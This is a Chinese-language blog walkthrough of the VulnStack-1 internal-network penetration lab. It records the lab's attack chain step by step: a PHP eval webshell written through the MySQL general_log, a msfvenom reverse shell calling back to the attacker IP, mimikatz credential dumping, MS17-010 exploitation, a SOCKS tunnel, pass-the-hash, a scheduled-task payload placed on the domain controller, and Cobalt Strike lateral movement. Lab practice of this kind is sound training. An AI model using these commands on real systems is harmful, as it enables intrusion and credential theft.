内网渗透——VulnStack-1

前言

最近打了一下红日安全的VulnStack,一个内网渗透靶场,挺好玩的,而且对新手也比较友好,感觉自己对Metasploit和CobaltStike的操作也更熟悉了,在这里记录一下。靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

环境搭建

kali攻击机:192.168.229.133

Windows 7 x64:192.168.52.143、192.168.229.138

Windows Server 2008:192.168.52.138

Windows2003:192.168.52.141

环境配置好后,在Windows7中利用phpstudy开启Web服务,接下来就直接开搞。

外网突破

信息收集

nmap扫一波:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
nmap -sS -sC -A -Pn -p- --min-rate 5000 192.168.229.138                                                                        
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-07-01 04:45 EDT
Nmap scan report for 192.168.229.138
Host is up (0.00035s latency).
Not shown: 65523 closed ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014 
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: GOD)
1025/tcp open  msrpc        Microsoft Windows RPC
1026/tcp open  msrpc        Microsoft Windows RPC
1027/tcp open  msrpc        Microsoft Windows RPC
1028/tcp open  msrpc        Microsoft Windows RPC
1029/tcp open  msrpc        Microsoft Windows RPC
1030/tcp open  msrpc        Microsoft Windows RPC
3306/tcp open  mysql        MySQL (unauthorized)
3389/tcp open  tcpwrapped
| ssl-cert: Subject: commonName=stu1.god.org
| Not valid before: 2022-06-29T05:13:38
|_Not valid after:  2022-12-29T05:13:38
|_ssl-date: 2022-07-01T08:46:49+00:00; -2s from scanner time.
MAC Address: 00:0C:29:58:D7:1A (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -2h00m01s, deviation: 3h59m59s, median: -2s
|_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:58:d7:1a (VMware)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: stu1
|   NetBIOS computer name: STU1\x00
|   Domain name: god.org
|   Forest name: god.org
|   FQDN: stu1.god.org
|_  System time: 2022-07-01T16:46:35+08:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-07-01T08:46:35
|_  start_date: 2022-07-01T08:35:44

TRACEROUTE
HOP RTT     ADDRESS
1   0.35 ms 192.168.229.138

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.94 seconds

可以看到开放了80、3306、3389、445这些端口。接下来我们去80端口看看,发现一个phpstudy探针的界面:

image-20220701165347277

这是版本老一点的phpstudy会出现的界面,我们在该界面中可以利用弱口令root/root成功连接MySQL:

image-20220701165634053

dirsearch扫描后,还有这些目录:

image-20220701165726039

MySQL写入webshell

phpstudy默认是安装了phpmyadmin的,那我们就可以利用刚刚得到的账号密码来登陆phpmyadmin了。登陆之后,当然就是要看看能不能写个webshell了,首先看看写文件的配置开了没:

image-20220701170000896

没打开,那我们就利用日志写webshell吧,看看日志的全局变量:

image-20220701170124949

那我们利用如下SQL语句给改一下吧:

1
2
set global general_log = "ON";
set global general_log_file='C:\\phpStudy\\WWW\\shell.php';

image-20220701170417177

接下来再随便写个select语句把webshell写进日志里:

1
SELECT "<?php eval($_POST['shell']);?>"

这样就成功写入webshell了:

image-20220701170614588

蚁剑连接,成功突破外网!

MSF

内网初探

首先构造个windows的马:

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.229.133 LPORT=1234 -f exe -o ma.exe

然后利用蚁剑给传上去,接着在msf的exploit/multi/handler的模块中做好相应配置:

image-20220701172030141

在蚁剑终端中允许木马,进入meterpreter。把mimikatz.exe利用蚁剑也上传一下:

1
2
3
4
5
upload ./Desktop/mimikatz C:\\
shell
mimikatz.exe
privilege::debug#权限提升
sekurlsa::logonPasswords#明文抓取

尝试拿一下系统密码:

image-20220701174721144

拿到明文密码:

image-20220701174839187

拿到密码,接下来尝试打开靶机的远程桌面。首先我们利用nmap扫一下3389端口,但是结果为filtered,3389端口存在防火墙过滤。我们可以利用msf的post/windows/manage/enable_rdp模块去尝试防火墙:

image-20220701182103081

再用nmap扫一下,成功关闭防火墙:

image-20220701182134202

那我们接下来就尝试打开靶机的远程桌面,利用post/windows/manage/enable_rdp中的rdesktop命令进行远程登陆:

image-20220701182419901

至此,对这台win7的渗透基本完成,接下来继续进行内网横向移动,可以利用如下命令拿到一些内网信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
net view                 # 查看局域网内其他主机名
net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user                 # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators # 查看本地管理员组(通常会有域用户)
net view /domain         # 查看有几个域
net user 用户名 /domain   # 获取指定域用户的信息
net group /domain        # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net time /domain    #判断主域,主域服务器一般做时间服务器
net group 组名 /domain    # 查看域中某工作组
net group "domain admins" /domain  # 查看域管理员的名字
net group "domain computers" /domain  # 查看域中的其他主机名
net group "domain controllers" /domain  # 查看域控制器主机名(可能有多台)
ipconfig /all #查询本机IP段,所在域等

net view

image-20220701172233614

net config Workstation

image-20220701172322585

可以看到登陆域为GOD,计算机名为STU1。

net user

image-20220701172424042

net user /domain

image-20220701172506188

net localgroup administrators

image-20220701172731217

net view /domain

image-20220701172803499

只有一个GOD域。

net user Administrator /domain

image-20220701172953199

net group "domain admins" /domain

image-20220701173128166

可以看到Administrator为域管。

net group "domain controllers " /domain

image-20220701173317196

DC为OWA这台主机。

ipconfig /all

image-20220701182815869

可以得知这台主机的内网IP为192.168.52.143,我们可以利用nmap来扫描一波内网(这台主机内置nmap了):

image-20220701183124997

拿到内网的另外两台主机的IP为192.168.52.138和192.168.52.141。

内网突破

接下来对这两个内网主机的渗透都基本依托攻击机的msf完成,所以我们这里直接在msf中添加路由来使攻击机可以访问到内网资源:

1
run autoroute -s 192.168.52.0/24

image-20220701195219880

接着我们尝试扫描永恒之蓝:

1
2
3
4
use auxiliary/scanner/smb/smb_version
show options
set rhosts 192.168.52.141
exploit

image-20220701195513265

445端口开启,存在smb服务,看看是否存在永恒之蓝:

image-20220701195636083

很有可能存在,那我们尝试打一下:

1
2
3
4
5
use auxiliary/admin/smb/ms17_010_command
options
set command whoami
set rhosts 192.168.52.141
run

image-20220701211222844

成功执行命令!那我们接下来再看一下这台主机的端口,很简单,只需要将command参数改为netstat -na继续run一下就可以了:

image-20220701211350099

并未发现3389端口,那我们再利用如下命令再开一下3389端口:

1
REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

image-20220701212047024

接着再查看一下端口:

image-20220701212102819

3389端口被成功打开,接着就是要开启远程桌面了。但是这台主机并不能访问外网,因此不能访问我们的攻击机。这里我们使用别的师傅提到的隐藏通信隧道技术,借助那台win7作为跳板机完成内网穿透。

将ew_for_win32.exe给Win7上传上去,接着在我们攻击机本地添加转接隧道:

1
./ew_for_linux -s rcsocks -l 1080 -e 4444 #要先把4444端口给打开

接着在Win7中执行:

1
ew_for_win_32.exe -s rssocks -d 192.168.229.133 -e 4444

image-20220701212740562

隧道搭建成功。接下来我们修改proxychains4.conf添加如下代理:

1
socks5  192.168.229.133 1080

保存并退出后执行

1
proxychains rdesktop 192.168.52.141

image-20220701213408165

使用之前拿到的域管的账号,成功登陆!拿下192.168.52.141:

image-20220701213500383

接着我们开始打192.168.52.138,但是这台主机利用刚刚上面的方法,却无法拿到远程桌面。

image-20220701214410519

一直连接不上。尝试拿Win7那台nmap扫一下192.168.52.138这台,才发现3389给设置了防火墙:

image-20220701220224803

那这台看来确实是没法拿到远程桌面了。除非是进去给他防火墙关了:

image-20220701220729492

这下再尝试利用刚刚的方法拿远程桌面就能拿到了:

image-20220701220711892

但是这很明显没什么意思,那我们 就换个思路打它,试一下之前用mimikatz抓取的哈希值进行哈希传递登录域控:

1
2
mimikatz.exe
sekurlsa::pth /domain:god.org /user:administrator /ntlm:your_ntml_hash

尝试访问域控共享服务

1
dir \\192.168.52.138\c$

image-20220702022902556

访问成功。因为192.168.52.138这台不出网,但是又因为我们刚刚已经设置路由,所以接下来我们可以利用正向连接来拿shell。首先构造个正向连接的攻击载荷:

1
msfvenom -p windows/meterpreter/bind_tcp  LPORT=456 -f exe -o xxx.exe

接着我们将这个xxx.exe传入Win7那台机器,并从Win7传到192.168.52.138:

1
2
3
4
meterpreter > upload xxx.exe C:\\
meterpreter > shell
C:\>copy xxx.exe \\192.168.52.138\C$
C:\>schtasks /create /tn "evil_task" /tr C:\yyy.exe /sc once /st 12:00 /S 192.168.52.138 /RU System  /u administrator /p "your_password"

接着利用exploit/multi/handler模块,设置payload为windows/meterpreter/bind_tcp,设置好rhost和lport,然后run就可以了:

image-20220702025146824

至此,MSF正式打完!

CobaltStrike

上线CS

利用http listenner生成一个payload,然后放到蚁剑那里去执行以下:

image-20220702025559691

成功上线:

image-20220702025616044

同样的内网信息收集就不在这里再列举了,可以参考MSF收集信息时的步骤。对了,记得使用命令前,设置一下sleep,毕竟是靶机嘛,可以稍微大胆一点。

内网突破

利用CS自带的mimikatz拿到明文密码:

image-20220702030022084

image-20220702030153351

接着我们可以利用psexec和刚刚得到的密码,与内网中别的主机进行连接:

image-20220702030315702

image-20220702030354739

其中监听器设置SMB,会话选择Win7的那台。成功连接:

image-20220702030441329

image-20220702030453713

可以看一下文件管理:

image-20220702030519270

另外一台也是同样的方法,成功连接:

image-20220702030618391

顺便利用梼杌插件来个小娱乐:

image-20220702031636250

image-20220702031657035

至此,打完,收工!